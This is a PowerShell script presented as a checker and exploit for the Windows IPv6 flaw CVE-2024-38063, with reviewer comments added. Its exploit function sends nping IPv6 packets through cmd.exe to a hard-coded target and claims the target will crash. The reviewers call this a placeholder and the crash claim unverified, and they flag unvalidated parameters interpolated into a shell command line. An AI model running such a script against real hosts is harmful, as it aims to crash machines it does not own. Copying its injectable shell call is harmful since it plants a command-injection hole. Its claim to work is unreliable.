# CVE-2024-38063 Vulnerability Checker and Exploit
# Powershell Version
# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Exploit
# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
#
# Patch thresholds read by the version check, each a full Major.Minor.Build.Revision.
# NOTE(review): the fourth field is only comparable between two versions that share
# the same third field (build), so each threshold can describe one build branch only;
# the header above applies them to whole product families.
$serverMinVersion = [System.Version]::Parse("10.0.17763.6189")
$minVersion = [System.Version]::Parse("10.0.26100.1457")
# Version of the OS running this script, as reported by .NET.
# NOTE(review): presumably the fourth field is 0 here on Windows 10 and later, which
# would make any comparison against a non-zero revision meaningless - confirm on a test host.
$osVersion = [System.Environment]::OSVersion.Version
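# Function to check if the system is vulnerable
function Check-Vulnerability {
    <#
    .SYNOPSIS
    Reports whether the local OS version is below the patch threshold this
    script holds for its build branch.

    .DESCRIPTION
    Reads the script-level $osVersion, $minVersion and $serverMinVersion.

    A threshold is applied only when its Major.Minor.Build equals that of the
    local OS, because a revision number can only be compared inside one build
    branch. The previous if/elseif compared every host with $minVersion first;
    $serverMinVersion is the lower value, so the elseif could never run and a
    host on build 17763 was reported as vulnerable whatever its revision.

    For a build that neither threshold describes, the function says so instead
    of naming a product, and keeps the previous result: $true below
    $minVersion, $false otherwise.

    The result describes the machine running the script and nothing else.

    .OUTPUTS
    System.Boolean. $true when the host may be missing the fix, otherwise $false.
    #>
    $current = $osVersion

    # [System.Environment]::OSVersion may report 0 (or no value) as the fourth
    # field on Windows 10 and later; the update revision is then taken from the
    # UBR registry value so that the comparison below has something to compare.
    if ($current.Revision -le 0) {
        try {
            $ubr = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name 'UBR' -ErrorAction Stop).UBR
            $current = New-Object -TypeName System.Version -ArgumentList $current.Major, $current.Minor, $current.Build, ([int]$ubr)
        } catch {
            # UBR not readable: keep the reported version. With revision 0 the
            # result leans towards "may be vulnerable" rather than a false all-clear.
        }
    }

    # True when a threshold belongs to the same Major.Minor.Build as this host.
    $sameBranch = {
        param([Version]$threshold)
        ($threshold.Major -eq $current.Major) -and
        ($threshold.Minor -eq $current.Minor) -and
        ($threshold.Build -eq $current.Build)
    }

    if (& $sameBranch $minVersion) {
        if ($current -lt $minVersion) {
            # Label kept from the script header; build number alone does not
            # distinguish client from server editions.
            Write-Host "[+] Your Windows 10/11 system may be vulnerable to CVE-2024-38063."
            return $true
        }
    } elseif (& $sameBranch $serverMinVersion) {
        if ($current -lt $serverMinVersion) {
            Write-Host "[+] Your Windows Server system may be vulnerable to CVE-2024-38063."
            return $true
        }
    } elseif ($current -lt $minVersion) {
        # Neither threshold applies to this build branch, so the patch level
        # cannot be judged from the two values this script knows.
        Write-Host "[?] Build $current is not covered by the thresholds in this script; compare the installed updates with the vendor advisory for CVE-2024-38063."
        return $true
    }

    Write-Host "[-] Your system appears to be up-to-date and not vulnerable."
    return $false
}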
# Function to exploit the vulnerability by sending crafted packets
# Placeholder for using an external tool like nping
#
# What the code below does: prints a start message, builds one nping command line
# from the two parameters, runs it through cmd.exe /c and waits for it to end,
# then prints a completion message. It returns nothing.
#
# Parameters:
#   DestinationIP  - string placed at the end of the nping command line
#   DestinationMAC - string placed after --dest-mac
#
# NOTE(review): both parameters are plain [string] with no validation and are
# interpolated into text that cmd.exe parses. Anything other than a bare address
# in either value is interpreted by the shell; validate the format first or pass
# the values to the program as separate arguments.
# NOTE(review): nothing on this page shows that the traffic requested here
# reproduces the CVE-2024-38063 condition; the function itself is labelled a
# placeholder, and the crash described in the last message is an unverified claim.
function Exploit-Vulnerability {
param (
[string]$DestinationIP,
[string]$DestinationMAC
)
Write-Host "[+] Starting the exploit against $DestinationIP..."
# Craft packets using nping (part of nmap) for the exploit
# nping command for simulating crafted IPv6 packets
# NOTE(review): confirm every option against the installed nping's help output - TODO confirm
$npingCommand = "nping --ipv6 -c 5 --dest-mac $DestinationMAC -p 80 --data-length 1200 --raw-ipv6 $DestinationIP"
# The full command line, addresses included, is echoed to the console.
Write-Host "[i] Executing: $npingCommand"
# Execute the nping command to send crafted IPv6 packets
# cmd.exe is started in the current console (-NoNewWindow) and the script blocks
# until it exits (-Wait). Process-creation logging on the sending host, where
# enabled, would record this cmd.exe /c invocation with both addresses in its arguments.
Start-Process -FilePath "cmd.exe" -ArgumentList "/c", $npingCommand -NoNewWindow -Wait
# The exit status of the child process is not captured, so this message is
# printed even when nping is missing or rejects the command line.
Write-Host "[+] Exploit attempt complete. Check if the target is down (BSOD or crash should occur after 60 seconds)."
}
# Main Execution Flow
# Hard-coded destination values handed to Exploit-Vulnerability.
$dstMAC = "00:0C:29:55:E1:C8" # Target MAC address (replace with actual target)
$dstIP = "fe80::78b7:6283:49ad:c565" # Target IPv6 address (replace with actual target)

# NOTE(review): Check-Vulnerability evaluates the machine running this script,
# while $dstIP and $dstMAC name another host. The outcome of step 1 therefore
# says nothing about the patch level of that host.

# Step 1: run the local version check
$vulnerable = Check-Vulnerability

# Step 2: only when the check returned a true value, ask before going further
if (-not $vulnerable) {
    Write-Host "[-] System is not vulnerable, no exploit will be executed."
} else {
    $exploit = Read-Host "[?] Do you want to continue with the exploit? (Y/N)"
    if ($exploit -ne "Y") {
        # Any answer other than Y (compared case-insensitively) stops here.
        Write-Host "[-] Exploit aborted by user."
    } else {
        $destination = @{
            DestinationIP  = $dstIP
            DestinationMAC = $dstMAC
        }
        Exploit-Vulnerability @destination
    }
}